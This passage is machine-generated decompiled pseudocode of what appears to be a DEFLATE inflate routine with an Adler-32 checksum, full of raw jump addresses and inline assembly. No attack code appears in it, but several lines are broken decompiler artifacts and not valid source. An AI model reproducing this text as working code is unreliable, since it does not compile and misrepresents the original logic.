				 *(_t1370 + 0x30) = _t1245 << _t530 |  *(_t1370 + 0x30);
				_t531 = _t530 + 0x20;
				 *(_t1370 + 0x38) = _t531;
				goto 0xf305fe7b;
				_t828 =  *((short*)(_t1410 + 0x3c + _t1208 * 2));
				if (_t828 < 0) goto 0xf305fea3;
				if ((_t828 & 0x0000ffff) - 0x200 < 0) goto 0xf306073e;
				goto 0xf305fecf;
				asm("dec eax");
				asm("adc edi, 0x0");
				if ( !_t828 - 0x23f > 0) goto 0xf30611c7;
				_t830 =  *((short*)(_t1410 + 0x83c + _t1302 * 2));
				_t964 = _t830;
				if (_t964 < 0) goto 0xf305fea8;
				 *(_t1370 + 0x40) = _t830 & 0x0000ffff;
				_t1249 =  *(_t1370 + 0x30) >> 0xb;
				 *(_t1370 + 0x30) = _t1249;
				_t532 = _t531 - 0xb;
				 *(_t1370 + 0x38) = _t532;
				r12b = 0x15;
				asm("bt edi, 0x8");
				if (_t964 < 0) goto 0xf305f43b;
				_t857 =  *((short*)(_t1410 + 0x3c + _t1208 * 2));
				if (_t857 < 0) goto 0xf305ff16;
				if ((_t857 & 0x0000ffff) - 0x200 < 0) goto 0xf306073e;
				goto 0xf305ff42;
				asm("dec eax");
				asm("adc esi, 0x0");
				if ( !_t857 - 0x23f > 0) goto 0xf3061207;
				if ( *((short*)(_t1410 + 0x83c + _t1323 * 2)) < 0) goto 0xf305ff1b;
				 *(_t1370 + 0x30) = _t1249 >> 0xb;
				 *(_t1370 + 0x38) = _t532 - 0xb;
				_t969 = _t1377 -  *((intOrPtr*)(_t1370 + 0x1a8));
				if (_t969 >= 0) goto 0xf3061284;
				 *((intOrPtr*)(_t1420 + _t1377)) = dil;
				asm("bt esi, 0x8");
				if (_t969 < 0) goto 0xf3060a8e;
				if (_t1377 + 1 -  *((intOrPtr*)(_t1370 + 0x1a8)) >= 0) goto 0xf30612a2;
				 *((intOrPtr*)(_t1420 + _t1377 + 1)) = sil;
				_t1378 = _t1377 + 2;
				_t534 =  *(_t1370 + 0x40);
				r12b = 0x15;
				if (_t534 - 0xff > 0) goto 0xf305f43b;
				_t972 = _t1378 -  *((intOrPtr*)(_t1370 + 0x1a8));
				if (_t972 == 0) goto 0xf3061262;
				if (_t972 >= 0) goto 0xf3061284;
				 *(_t1420 + _t1378) = _t534;
				_t1379 = _t1378 + 1;
				r12b = 0xc;
				_t535 =  *(_t1370 + 0x38);
				if (_t535 - 0xe > 0) goto 0xf30600a1;
				_t1212 = __r15 - _t1449;
				if (_t1212 - 1 > 0) goto 0xf3060085;
				_t704 =  *((short*)(_t1410 + 0xddc + _t1212 * 2));
				if (_t704 < 0) goto 0xf3060019;
				if ((_t704 & 0x0000ffff) - 0x200 < 0) goto 0xf3060056;
				_t705 = _t704 >> 9;
				if (_t535 - _t705 < 0) goto 0xf3060056;
				goto 0xf30600a1;
				if (_t535 - 0xb < 0) goto 0xf3060056;
				asm("dec eax");
				asm("adc ecx, 0x0");
				if ( !_t705 - 0x23f > 0) goto 0xf30611b9;
				_t707 =  *((short*)(_t1410 + 0x15dc + _t1212 * 2));
				if (_t707 >= 0) goto 0xf3060051;
				if (_t535 - 0xc >= 0) goto 0xf3060023;
				if (_t707 >= 0) goto 0xf30600a1;
				if (_t1449 == __r15) goto 0xf3060156;
				_t1349 = _t1348 << _t535;
				_t1253 =  *(_t1370 + 0x30) | _t1349;
				 *(_t1370 + 0x30) = _t1253;
				_t536 = _t535 + 8;
				 *(_t1370 + 0x38) = _t536;
				if (_t536 - 0xe <= 0) goto 0xf305ffed;
				goto 0xf30600a1;
				_t1350 = _t1349 << _t536;
				_t1254 = _t1253 | _t1350;
				 *(_t1370 + 0x30) = _t1254;
				_t537 = _t536 + 0x10;
				 *(_t1370 + 0x38) = _t537;
				_t832 =  *((short*)(_t1410 + 0xddc + _t1212 * 2));
				if (_t832 < 0) goto 0xf30600c3;
				goto 0xf30600ef;
				asm("dec eax");
				asm("adc edi, 0x0");
				if ( !(_t832 & 0x000001ff) - 0x23f > 0) goto 0xf30611c7;
				_t835 =  *((short*)(_t1410 + 0x15dc + _t1302 * 2));
				if (_t835 < 0) goto 0xf30600c8;
				if (0xa == 0) goto 0xf30606cb;
				 *(_t1370 + 0x30) = _t1254 >> 0xb;
				 *(_t1370 + 0x38) = _t537 - 0xb;
				if ((_t835 & 0x0000ffff) - 0x1d > 0) goto 0xf306013e;
				 *(_t1370 + 0x44) =  *(_t1302 + 0xf311ef48) & 0x000000ff;
				 *(_t1370 + 0x3c) =  *(0xf311ef68 + _t1302 * 2) & 0x0000ffff;
				_t720 =  ==  ? 0x1601 : 0x1001;
				r12d = 0x2101;
				r12d = r12d & 0x00003700;
				_t991 =  ==  ? 0x1601 : 0x1001;
				if (( ==  ? 0x1601 : 0x1001) == 0) goto 0xf305ffd4;
				goto 0xf3060485;
				r12d =  *(_t1370 + 0x7c);
				goto 0xf3060149;
				_t722 =  *(_t1370 + 0x38);
				_t652 =  *(_t1370 + 0x50);
				if (_t722 - 8 >= 0) goto 0xf3060565;
				if (__r15 == __r15) goto 0xf306019f;
				 *(_t1370 + 0x30) =  *(_t1370 + 0x30) | _t1350 << _t722;
				 *(_t1370 + 0x38) = _t722 + 8;
				_t1453 = __r15 + 1;
				goto 0xf30601a4;
				if ((bpl & 0x00000002) == 0) goto 0xf3060172;
				_t1110 =  *((intOrPtr*)(_t1370 + 0x1a8));
				_t995 = _t1379 - _t1110;
				if (_t995 == 0) goto 0xf3061238;
				if (_t995 >= 0) goto 0xf3061284;
				 *((char*)(_t1420 + _t1379)) =  *(_t1370 + 0x3c);
				_t1380 = _t1379 + 1;
				r12d = 0x11;
				r12d =  ==  ? 6 : r12d;
				 *(_t1370 + 0x40) =  *(_t1370 + 0x40) - 1;
				r12d =  ==  ? 6 : r12d;
				 *(_t1370 + 0x70) = __r13;
				r13d =  *(_t1370 + 0x3c);
				_t1352 =  *((intOrPtr*)(_t1370 + 0x1a8));
				if (_t1380 == _t1352) goto 0xf3060b97;
				_t1184 = _t1352 - _t1380;
				_t1324 = _t1380;
				_t1185 =  >=  ? _t1110 : _t1184;
				 *((long long*)(_t1370 + 0x28)) =  *(_t1370 + 0xb8);
				 *((long long*)(_t1370 + 0x20)) = _t1185;
				_t1402 = _t1324;
				E000007FE7FEF30616A0();
				_t1411 =  *((intOrPtr*)(_t1370 + 0x58));
				_t1384 = _t1324 + _t1185;
				r12b = 0xc;
				 *(_t1370 + 0x40) =  *(_t1370 + 0x40) - _t652;
				if (_t1184 != _t1110) goto 0xf3060208;
				_t1434 =  *(_t1370 + 0x70);
				r12b = 3;
				if ( *((intOrPtr*)(_t1411 + 0x18)) == 0) goto 0xf305f43b;
				_t724 =  *(_t1370 + 0x38);
				_t1303 =  *((intOrPtr*)(_t1370 + 0xe0));
				_t895 =  >=  ? r14d : _t724 >> 3;
				_t653 = _t1352 * 8;
				_t544 = (_t724 & 0xfffffff8) - _t653;
				 *(_t1370 + 0x38) = _t544;
				_t1456 = _t1453 - __r15 + _t1303 - _t1352;
				if (_t1456 - _t1303 > 0) goto 0xf30613c7;
				_t1457 = _t1456 + _t1434;
				 *(_t1370 + 0x30) =  !(0xffffffff << (_t544 & 0x00000038)) &  *(_t1370 + 0x30) >> (_t724 & 0x00000007);
				r12b = 0x18;
				if (( *(_t1370 + 0x1b8) & 0x00000001) == 0) goto 0xf305f43b;
				 *(_t1370 + 0x40) = 0;
				r12b = 0x17;
				_t728 =  *(_t1370 + 0x40) & 0x000001ff;
				 *(_t1370 + 0x40) = _t728;
				r12b = 0x14;
				if (_t728 == 0x100) goto 0xf305f43b;
				r12b = 0x20;
				if (_t728 - 0x11d > 0) goto 0xf305f43b;
				_t729 =  *(_t1110 + 0xf311eee8) & 0x000000ff;
				_t1005 = _t729;
				r12b = _t1005 == 0;
				 *(_t1370 + 0x44) = _t729;
				 *(_t1370 + 0x40) =  *(0xf311ef08 + _t1110 * 2) & 0x0000ffff;
				r12b = r12b | 0x0000000e;
				r9d =  *(_t1370 + 0x3c);
				if (_t1005 >= 0) goto 0xf3060382;
				r12b = 0x1d;
				if ( *((intOrPtr*)(_t1370 + 0xf4)) != 0) goto 0xf305f43b;
				_t1325 = _t1384 + 0xf311ef08;
				_t1262 =  *((intOrPtr*)(_t1370 + 0x1a8));
				_t1007 = _t1325 - _t1262;
				if (_t1007 > 0) goto 0xf30603b1;
				_t1114 = (_t1384 - _t1402 &  *(_t1370 + 0xb8)) - _t1384;
				if (_t1007 < 0) goto 0xf3060a9a;
				if (_t1114 - 0xf311ef08 >= 0) goto 0xf3060a9a;
				r12d = 0x13;
				r12d =  ==  ? 0xc : r12d;
				_t552 =  *(_t1370 + 0x40);
				_t840 =  *(_t1370 + 0x50);
				if (_t552 - 3 > 0) goto 0xf3060605;
				_t731 =  *(_t1370 + 0x38);
				if (_t731 == 0) goto 0xf3060421;
				_t1357 = _t1457;
				if (_t731 - 8 >= 0) goto 0xf3060436;
				if (_t1357 == __r15) goto 0xf3060413;
				_t1187 =  *(_t1370 + 0x30) | _t1262 << _t731;
				 *(_t1370 + 0x30) = _t1187;
				 *(_t1370 + 0x38) = _t731 + 8;
				r12d = 0;
				goto 0xf3060419;
				r12d = _t840;
				if ((r12b & 0x00000002) == 0) goto 0xf30603e8;
				goto 0xf306046a;
				if (_t1357 + 1 == __r15) goto 0xf3060464;
				goto 0xf3060453;
				_t1265 = _t1187 >> 8;
				 *(_t1370 + 0x30) = _t1265;
				 *(_t1370 + 0x38) = ( *(_t1411 + 0x14) << 8) + 0xfffffff8;
				_t802 =  *(_t1411 + 0x14) << 8;
				_t737 = _t653 & 0x000000ff | _t802;
				 *(_t1411 + 0x14) = _t737;
				 *(_t1370 + 0x40) = _t552 + 1;
				r12d = 0;
				goto 0xf306046a;
				r12d = _t840;
				if (r12b == 0) goto 0xf30603cf;
				if ((r12b & 0xffffffff) == 1) goto 0xf30606d0;
				goto 0xf3060c1b;
				_t555 = _t737 & 0x000000ff;
				if (_t555 == 1) goto 0xf30606d0;
				goto 0xf3060c27;
				_t897 =  !_t895 & _t802;
				_t1266 = _t1265 >> _t555;
				 *(_t1370 + 0x30) = _t1266;
				 *(_t1370 + 0x38) = _t653;
				 *(_t1370 + 0x40) =  *(_t1370 + 0x40) + _t897;
				r12b = 0xf;
				goto 0xf305f43b;
				 *(_t1370 + 0x30) = _t1266 >> _t555;
				 *(_t1370 + 0x38) = _t653;
				 *(_t1370 + 0x3c) =  *(_t1370 + 0x3c) + ( !_t897 & _t802);
				r12b = 0x16;
				goto 0xf305f43b;
				 *(_t1370 + 0x30) = _t1187 >> _t555;
				 *(_t1370 + 0x38) = _t840;
				 *(_t1370 + 0x80) = _t1114;
				 *(_t1370 + 0x88) = _t1114;
				 *((long long*)(_t1370 + 0x90)) = 0xb;
				_t741 =  *(_t1370 + 0x3c);
				_t1115 = _t1114 & 0xf311ef08;
				if (3 == 3) goto 0xf30612f1;
				if (_t741 != 0x10) goto 0xf30606d9;
				if (_t1325 - 1 - 0x1c9 >= 0) goto 0xf3061307;
				goto 0xf30606db;
				 *(_t1370 + 0x30) = _t1115 >> 8;
				 *(_t1370 + 0x38) = _t741 + 0xfffffff8;
				 *(_t1370 + 0x3c) = 3;
				r12b = 0x12;
				goto 0xf305f43b;
				_t558 =  *(_t1411 + 0x291d) & 0x0000ffff;
				 *(_t1370 + 0x40) = _t558;
				r12b = 0x1e;
				if (_t558 != 0x2101) goto 0xf305f43b;
				r12b = 0x14;
				if (_t558 == 0) goto 0xf305f43b;
				r12d = 0x11;
				r12d =  ==  ? 6 : r12d;
				goto 0xf305f43b;
				r8d = 0x120;
				_t1220 =  *((intOrPtr*)(_t1370 + 0x128));
				E000007FE7FEF30F24C0();
				_t1412 =  *((intOrPtr*)(_t1370 + 0x58));
				 *(_t1370 + 0x40) = 0;
				r12b = 9;
				goto 0xf305f43b;
				r12b = 0x18;
				goto 0xf305f43b;
				if (_t1115 - 0xf >= 0) goto 0xf3060746;
				r9d =  *(_t1370 + 0x6c);
				if (_t1220 - 1 > 0) goto 0xf3060acc;
				_t745 =  *(_t1370 + 0x38);
				_t563 =  *((short*)(_t1412 + 0x3c + _t1115 * 2));
				if (_t563 < 0) goto 0xf3060659;
				if ((_t563 & 0x0000ffff) - 0x200 < 0) goto 0xf3060699;
				_t564 = _t563 >> 9;
				if (_t745 - _t564 < 0) goto 0xf3060699;
				goto 0xf3060aec;
				if (_t745 - 0xb < 0) goto 0xf3060699;
				asm("dec eax");
				asm("adc eax, 0x0");
				if ( !_t564 - 0x23f > 0) goto 0xf3061218;
				_t566 =  *((short*)(_t1412 + 0x83c + _t1115 * 2));
				if (_t566 >= 0) goto 0xf3060690;
				if (_t745 - 0xc >= 0) goto 0xf3060663;
				if (_t566 >= 0) goto 0xf3060aec;
				if (__r15 == __r15) goto 0xf3061245;
				_t1461 = __r15 + 1;
				 *(_t1370 + 0x30) =  *(_t1370 + 0x30) | _t1115 << _t745;
				 *(_t1370 + 0x38) = _t1220 + 8;
				_t1036 = _t745 - 6;
				if (_t1036 <= 0) goto 0xf3060631;
				goto 0xf3060aee;
				r12w = 0x2200;
				r12d = r12d >> 8;
				goto 0xf305f43b;
				_t1305 =  *((intOrPtr*)(_t1370 + 0x80 + _t1115 * 8)) + (_t1187 & 0xffffffff);
				if (_t1036 < 0) goto 0xf30613e0;
				if (_t1305 + _t1325 - 0x1c9 > 0) goto 0xf30613f4;
				if (_t1305 == 0) goto 0xf3060718;
				E000007FE7FEF30F24C0();
				 *(_t1370 + 0x40) =  *(_t1370 + 0x40) + _t840;
				r12b = 0xa;
				_t1413 =  *((intOrPtr*)(_t1370 + 0x58));
				_t1423 =  *((intOrPtr*)(_t1370 + 0x1a0));
				_t1387 =  *(_t1370 + 0x70);
				goto 0xf305f43b;
				r12b = 0x1a;
				goto 0xf305f43b;
				r12b = 0x22;
				goto 0xf305f43b;
				goto 0xf3060aee;
				_t864 =  *(_t1370 + 0x38);
				 *(_t1370 + 0x68) =  *(_t1370 + 0x3c);
				r9d =  *(_t1370 + 0x44);
				_t1121 = __r15 - _t1461;
				r12b = 0xc;
				if (_t1121 - 0xe < 0) goto 0xf3060b66;
				if (_t864 - 0x1d > 0) goto 0xf3060794;
				_t1122 = _t1121 << _t864;
				_t1462 = _t1461 + 4;
				_t748 =  *((short*)(_t1413 + 0x3c + _t1122 * 2));
				if (_t748 < 0) goto 0xf30607bc;
				if (0x2101 - 0x200 < 0) goto 0xf30611d8;
				goto 0xf30607e8;
				asm("dec eax");
				asm("adc ecx, 0x0");
				if ( !_t748 - 0x23f > 0) goto 0xf306126f;
				_t1044 =  *((short*)(_t1413 + 0x83c +  &(( *(_t1370 + 0xe8))[_t1325]) * 2));
				if (_t1044 < 0) goto 0xf30607c1;
				asm("bt ebp, 0x8");
				if (_t1044 < 0) goto 0xf30608a8;
				_t580 =  *((short*)(_t1413 + 0x3c + _t1122 * 2));
				if (_t580 < 0) goto 0xf3060820;
				if ((_t580 & 0x0000ffff) - 0x200 < 0) goto 0xf30611d8;
				goto 0xf306084b;
				asm("dec eax");
				asm("adc eax, 0x0");
				if ( !_t580 - 0x23f > 0) goto 0xf306127b;
				_t582 =  *((short*)(_t1413 + 0x83c + _t1122 * 2));
				if (_t582 < 0) goto 0xf3060825;
				_t583 = _t582 & 0x0000ffff;
				_t1049 = _t1387 -  *((intOrPtr*)(_t1370 + 0x1a8));
				if (_t1049 >= 0) goto 0xf3061284;
				_t867 = _t864 + 0x20;
				 *(_t1423 + _t1387) = bpl;
				_t1222 = _t1387 + 1;
				asm("bt eax, 0x8");
				if (_t1049 < 0) goto 0xf30608a3;
				_t1275 =  *((intOrPtr*)(_t1370 + 0x1a8));
				if (_t1222 - _t1275 >= 0) goto 0xf30612a2;
				 *(_t1423 + _t1387 + 1) = _t583;
				if (_t1275 - _t1387 + 2 - 0x103 < 0) goto 0xf3060b66;
				goto 0xf3060773;
				_t1389 = _t1222;
				_t585 = _t583 & 0x000001ff;
				if (_t585 == 0x100) goto 0xf3060b5e;
				if (_t585 - 0x11d > 0) goto 0xf3061298;
				if (_t867 - 0x1d > 0) goto 0xf30608ec;
				if (__r15 - _t1462 - 3 <= 0) goto 0xf306140a;
				_t1463 = _t1462 + 4;
				r9d =  *0x7FEF311EEE7 & 0x000000ff;
				if (r9b == 0) goto 0xf306092b;
				_t593 =  *((short*)(_t1413 + 0xdda));
				if (_t593 < 0) goto 0xf3060955;
				if ((_t593 & 0x0000ffff) - 0x200 < 0) goto 0xf30611d8;
				goto 0xf3060980;
				asm("dec eax");
				asm("adc eax, 0x0");
				if ( !_t593 - 0x23f > 0) goto 0xf306127b;
				_t595 =  *((short*)(_t1413 + 0x15da));
				if (_t595 < 0) goto 0xf306095a;
				_t870 = _t867 + 0x20 - r9d - 0xb;
				if ((_t595 & 0x1ff) - 0x1d > 0) goto 0xf30612ae;
				r9d =  *0x7FEF311EF47 & 0x000000ff;
				 *(_t1370 + 0x68) =  *0x7FEF311EF66 & 0x0000ffff;
				 *((long long*)(_t1370 + 0x118)) = _t1402;
				if (r9d == 0) goto 0xf3060a01;
				if (_t870 - 0x1d > 0) goto 0xf30609e2;
				if (__r15 - _t1463 - 3 <= 0) goto 0xf306140a;
				_t1314 = ((( *(_t1370 + 0x30) | _t1122) >> 0x0000000a >> 0xb | __r15 - _t1462 << _t867) >> r9d >> 0xb | 0xffffffff << r9d << _t870) >> r9d;
				_t872 = _t870 + 0x20 - r9d;
				 *(_t1370 + 0x68) = ( !( *_t1463) & _t840) +  *(_t1370 + 0x68);
				r9d =  *(_t1370 + 0x68);
				if (_t1389 - _t1402 >= 0) goto 0xf3060a19;
				if ( *((intOrPtr*)(_t1370 + 0xf4)) != 0) goto 0xf30612b6;
				 *(_t1370 + 0x70) = _t1434;
				 *((long long*)(_t1370 + 0x120)) = 0xf311ef68;
				 *((long long*)(_t1370 + 0x28)) =  *(_t1370 + 0xb8);
				 *((long long*)(_t1370 + 0x20)) = 0xf311ef68;
				_t1225 = _t1423;
				_t1280 =  *((intOrPtr*)(_t1370 + 0x1a8));
				E000007FE7FEF306148C(_t1225, _t1280, _t1389, _t1402);
				if ( *((intOrPtr*)(_t1370 + 0x1a8)) - _t1389 +  *((intOrPtr*)(_t1370 + 0x120)) - 0x103 >= 0) goto 0xf306076a;
				goto 0xf3060b66;
				 *(_t1370 + 0x40) = _t872;
				goto 0xf305f43b;
				_t1138 =  *(_t1370 + 0xb8);
				 *((long long*)(_t1370 + 0x28)) = _t1138;
				 *((long long*)(_t1370 + 0x20)) = _t1225;
				_t1226 =  *((intOrPtr*)(_t1370 + 0x1a0));
				_t604 = E000007FE7FEF306148C(_t1226, _t1280, _t1225,  *((intOrPtr*)(_t1370 + 0x118)));
				_t1415 =  *((intOrPtr*)(_t1370 + 0x58));
				r12b = 0xc;
				goto 0xf305f43b;
				_t767 = _t604;
				_t1282 = _t1280 << _t767 |  *(_t1370 + 0x30);
				 *(_t1370 + 0x30) = _t1282;
				 *(_t1370 + 0x38) = _t604 + 0x10;
				goto 0xf3060aee;
				_t841 =  *((short*)(_t1415 + 0x3c + _t1226 * 2));
				if (_t841 < 0) goto 0xf3060b0d;
				goto 0xf3060b39;
				asm("dec eax");
				asm("adc edi, 0x0");
				if ( !(_t841 & 0x000001ff) - 0x23f > 0) goto 0xf30611c7;
				_t844 =  *((short*)(_t1415 + 0x83c + _t1314 * 2));
				if (_t844 < 0) goto 0xf3060b12;
				r12b = 0x22;
				if (0xa == 0) goto 0xf305f43b;
				 *(_t1370 + 0x30) = _t1282 >> 0xb;
				 *(_t1370 + 0x38) = _t767 - 0xb;
				 *(_t1370 + 0x40) = _t844 & 0x0000ffff;
				r12b = 0xd;
				goto 0xf305f43b;
				r12b = 0x14;
				 *(_t1370 + 0x30) = _t1314;
				 *(_t1370 + 0x38) = _t872;
				 *(_t1370 + 0x3c) =  *(_t1370 + 0x68);
				 *(_t1370 + 0x40) = 0x100;
				 *(_t1370 + 0x44) = r9d;
				goto 0xf305f43b;
				 *((char*)(_t1226 + 8)) = 0xfd;
				 *_t1226 = _t1138;
				 *((long long*)(_t1226 + 0x10)) = _t1138;
				goto 0xf3061193;
				r12b = 0x13;
				goto 0xf3060c5a;
				r12d = r12d >> 8;
				r9d = r12d;
				r12b = 2;
				_t1416 =  *((intOrPtr*)(_t1370 + 0x58));
				goto 0xf3060c14;
				r12d = r12d >> 8;
				r9d = r12d;
				r12b = 3;
				goto 0xf3060c31;
				r12d = r12d >> 8;
				r9d = r12d;
				r12b = 9;
				goto 0xf3060c31;
				r12b = 0xe;
				goto 0xf3060bdb;
				r12b = 0x10;
				r9d = 2 >> 8 >> 8;
				goto 0xf3060c31;
				r12b = 0xb;
				goto 0xf3060bee;
				r12b = 0x11;
				r9d = 0x100 >> 8 >> 8;
				goto 0xf3060c31;
				r12d = r12d >> 8;
				r9d = r12d;
				r12b = 0xa;
				goto 0xf3060c31;
				r12d = r12d >> 8;
				r9d = r12d;
				r12b = 5;
				goto 0xf3060c31;
				r9d = r12d;
				r12b = 8;
				goto 0xf3060c34;
				r12d = r12d >> 8;
				r9d = r12d;
				r12b = 0x17;
				goto 0xf3060c31;
				r12d = r12d >> 8;
				r9d = r12d;
				r12b = 0xf;
				if (r9b == 1) goto 0xf3060c9a;
				_t610 = r9b & 0xffffffff;
				if (_t610 == 0xfc) goto 0xf3060cbe;
				_t774 =  *(_t1370 + 0x38);
				_t848 =  >=  ? _t610 - r15d + r14d : _t774 >> 3;
				_t613 = _t1314 * 8;
				 *(_t1370 + 0x38) = _t774 - _t613;
				_t1328 =  &(_t1463[1]);
				_t1368 =  *((intOrPtr*)(_t1370 + 0x1b0));
				goto 0xf3060cc0;
				_t1227 =  *((intOrPtr*)(_t1370 + 0x1a8));
				if ( *(_t1370 + 0x70) != _t1227) goto 0xf3060cbb;
				r9b = 2;
				r9b = r9b - (_t613 & 0xffffff00 | r12b == 0x00000017);
				_t1396 = _t1227;
				goto 0xf3060cc0;
				r9b = 1;
				 *(_t1416 + 0x291c) = r12b;
				_t776 =  *(_t1370 + 0x38);
				 *(_t1416 + 8) = _t776;
				 *(_t1416 + 0x24) =  *(_t1370 + 0x3c);
				 *(_t1416 + 0x28) =  *(_t1370 + 0x40);
				 *(_t1416 + 0x2c) =  *(_t1370 + 0x44);
				 *_t1416 =  !(0xffffffff << _t776) &  *(_t1370 + 0x30);
				_t1077 =  *(_t1370 + 0x1b8) & 0x00000040;
				if (_t1077 != 0) goto 0xf3061169;
				if (_t1077 == 0) goto 0xf3061169;
				_t1078 = r9b;
				if (_t1078 < 0) goto 0xf3061169;
				_t1191 = _t1396 - _t1368;
				if (_t1078 < 0) goto 0xf306137a;
				 *(_t1370 + 0xb8) = _t1314;
				 *(_t1370 + 0x6c) = r9d;
				if (_t1396 -  *((intOrPtr*)(_t1370 + 0x1a8)) > 0) goto 0xf3061389;
				_t617 =  *(_t1416 + 0x20);
				_t1426 =  *((intOrPtr*)(_t1370 + 0x1a0)) + _t1368;
				_t851 = _t617 & 0x0000ffff;
				asm("xorps xmm0, xmm0");
				asm("movaps [esp+0xc0], xmm0");
				asm("movaps [esp+0xa0], xmm0");
				_t1229 = _t1191 & 0xfffffffc;
				 *(_t1370 + 0xf8) = _t1191;
				 *(_t1370 + 0x108) = _t1191;
				_t1147 = _t1229 - 0x3f51f0dfc0;
				 *(_t1370 + 0x50) = _t1147;
				r12d = 0x56c0;
				 *(_t1370 + 0xe8) = _t1426;
				 *(_t1370 + 0xd8) = _t1328;
				 *(_t1370 + 0x7c) = _t851;
				 *(_t1370 + 0x100) = _t1229;
				if (0x3f51f0dfc0 - __r12 < 0) goto 0xf3060efe;
				r11d = _t851 * 0x56c0;
				_t1437 = _t1426;
				 *(_t1370 + 0x80) =  *_t1437 & 0x000000ff;
				 *(_t1370 + 0x84) = _t1437[1] & 0x000000ff;
				 *(_t1370 + 0x88) = _t1437[2] & 0x000000ff;
				 *(_t1370 + 0x8c) = _t1437[3] & 0x000000ff;
				r10d = 0;
				 *((intOrPtr*)(_t1370 + 0xc0 + _t1416 * 4)) =  *((intOrPtr*)(_t1370 + 0xc0 + _t1416 * 4)) +  *((intOrPtr*)(_t1370 + 0x80 + _t1416 * 4));
				_t404 = _t1416 + 1; // 0x1
				if (_t404 != 4) goto 0xf3060e1d;
				asm("movaps xmm0, [esp+0xc0]");
				asm("movaps [esp+0x80], xmm0");
				 *((intOrPtr*)(_t1370 + 0xa0 + _t1328 * 4)) =  *((intOrPtr*)(_t1370 + 0xa0 + _t1328 * 4)) +  *((intOrPtr*)(_t1370 + 0x80 + _t1328 * 4));
				_t414 = _t1328 + 1; // 0x1
				_t1082 = _t414 - 4;
				if (_t1082 != 0) goto 0xf3060e4c;
				_t1148 = _t1147 + 0xfffffffc;
				if (_t1082 != 0) goto 0xf3060dea;
				_t662 =  *(_t1370 + 0xc0 + _t1148 * 4);
				 *(_t1370 + 0xc0 + _t1148 * 4) = _t662;
				_t421 = _t1148 + 1; // 0x1
				_t1192 = _t421;
				_t1149 = _t1192;
				if (_t1192 != 4) goto 0xf3060e77;
				 *((intOrPtr*)(_t1370 + 0xa0 + _t1149 * 4)) =  *((intOrPtr*)(_t1370 + 0xa0 + _t1149 * 4)) - _t662 * 0xfff1;
				_t428 = _t1149 + 1; // 0x1
				if (_t428 != 4) goto 0xf3060ea7;
				_t1153 = _t1368 * _t1229 >> 0x2f;
				_t1085 = 0x3f51f08900 - __r12;
				if (_t1085 >= 0) goto 0xf3060de2;
				_t1469 =  *(_t1370 + 0x108);
				r14d = r14d & 0x00000003;
				_t1399 =  *((intOrPtr*)(_t1370 + 0x58));
				r10d =  *(_t1370 + 0x1b8);
				_t1333 =  *(_t1370 + 0xe8);
				r12d =  *(_t1370 + 0x7c);
				if (_t1085 == 0) goto 0xf3060fc8;
				_t1405 = 0x3f51f0dfc0 + _t1333;
				 *(_t1370 + 0x80) =  *_t1405 & 0x000000ff;
				 *(_t1370 + 0x84) = _t1405[1] & 0x000000ff;
				 *(_t1370 + 0x88) = _t1405[2] & 0x000000ff;
				 *(_t1370 + 0x8c) = _t1405[3] & 0x000000ff;
				 *((intOrPtr*)(_t1370 + 0xc0 + _t1153 * 4)) =  *((intOrPtr*)(_t1370 + 0xc0 + _t1153 * 4)) +  *((intOrPtr*)(_t1370 + 0x80 + _t1153 * 4));
				_t452 = _t1153 + 1; // 0x1
				_t1289 = _t452;
				_t1154 = _t1289;
				if (_t1289 != 4) goto 0xf3060f72;
				asm("movaps xmm0, [esp+0xc0]");
				asm("movaps [esp+0x80], xmm0");
				_t815 =  *(_t1370 + 0x80 + _t1154 * 4);
				 *((intOrPtr*)(_t1370 + 0xa0 + _t1154 * 4)) =  *((intOrPtr*)(_t1370 + 0xa0 + _t1154 * 4)) + _t815;
				_t462 = _t1154 + 1; // 0x1
				_t1290 = _t462;
				_t1155 = _t1290;
				_t1087 = _t1290 - 4;
				if (_t1087 != 0) goto 0xf3060f9f;
				if (_t1087 != 0) goto 0xf3060f41;
				_t816 = _t815 * 0xfff1;
				 *((intOrPtr*)(_t1370 + 0xc0 + _t1155 * 4)) =  *((intOrPtr*)(_t1370 + 0xc0 + _t1155 * 4)) - _t816;
				_t470 = _t1155 + 1; // 0x1
				_t1294 = _t470;
				_t1156 = _t1294;
				if (_t1294 != 4) goto 0xf3060fd7;
				r9d =  *(_t1370 + 0x6c);
				 *((intOrPtr*)(_t1370 + 0xa0 + _t1156 * 4)) =  *((intOrPtr*)(_t1370 + 0xa0 + _t1156 * 4)) - _t816 * 0xfff1;
				_t479 = _t1156 + 1; // 0x1
				_t1298 = _t479;
				_t1157 = _t1298;
				if (_t1298 != 4) goto 0xf3061019;
				 *(_t1370 + 0xa0 + _t1157 * 4) =  *(_t1370 + 0xa0 + _t1157 * 4) << 2;
				_t1158 = _t1157 + 1;
				if (_t1158 != 4) goto 0xf3061051;
				 *((intOrPtr*)(_t1370 + 0xa4)) =  *((intOrPtr*)(_t1370 + 0xa4)) -  *((intOrPtr*)(_t1370 + 0xc4)) + 0xfff1;
				 *((intOrPtr*)(_t1370 + 0xa8)) =  ~( *((intOrPtr*)(_t1370 + 0xc8)) +  *((intOrPtr*)(_t1370 + 0xc8))) +  *((intOrPtr*)(_t1370 + 0xa8)) + 0x1ffe2;
				 *((intOrPtr*)(_t1370 + 0xac)) =  *((intOrPtr*)(_t1370 + 0xac)) + _t1298 + _t1298 * 2;
				_t1159 = _t1158 + 1;
				if (_t1159 != 4) goto 0xf30610b4;
				r12d = r12d *  *(_t1370 + 0x50);
				_t1161 = _t1159 * _t1368 >> 0x2f;
				_t1162 = _t1161 + 1;
				if (_t1162 != 4) goto 0xf30610e4;
				if (_t1469 == 0) goto 0xf306110b;
				_t786 = r12d +  *((intOrPtr*)(_t1370 + 0xc0 + _t1158 * 4)) + ( *(_t1333 +  *(_t1370 + 0x100) + _t1162) & 0x000000ff);
				_t921 = (_t617 >> 0x10) + r11d + r12d - 0x800000007961 +  *((intOrPtr*)(_t1370 + 0xa0 + _t1161 * 4)) + _t786;
				if (_t1469 != _t1162 + 1) goto 0xf30610fb;
				_t646 = _t921 * 0xfff1;
				_t924 = _t921 - _t646 << 0x00000010 | _t786 - _t786 * 0x0000fff1;
				 *(_t1399 + 0x20) = _t924;
				_t1095 = r9b;
				if (_t1095 != 0) goto 0xf30611a7;
				r10d = r10d & 0x00000001;
				if (_t1095 == 0) goto 0xf306117f;
				r9b = _t924 ==  *((intOrPtr*)(_t1399 + 0x14));
				r9b = r9b + r9b;
				r9b = r9b + 0xfe;
				goto 0xf306117f;
				_t1169 =  *((intOrPtr*)(_t1370 + 0x110));
				 *(_t1169 + 8) = r9b;
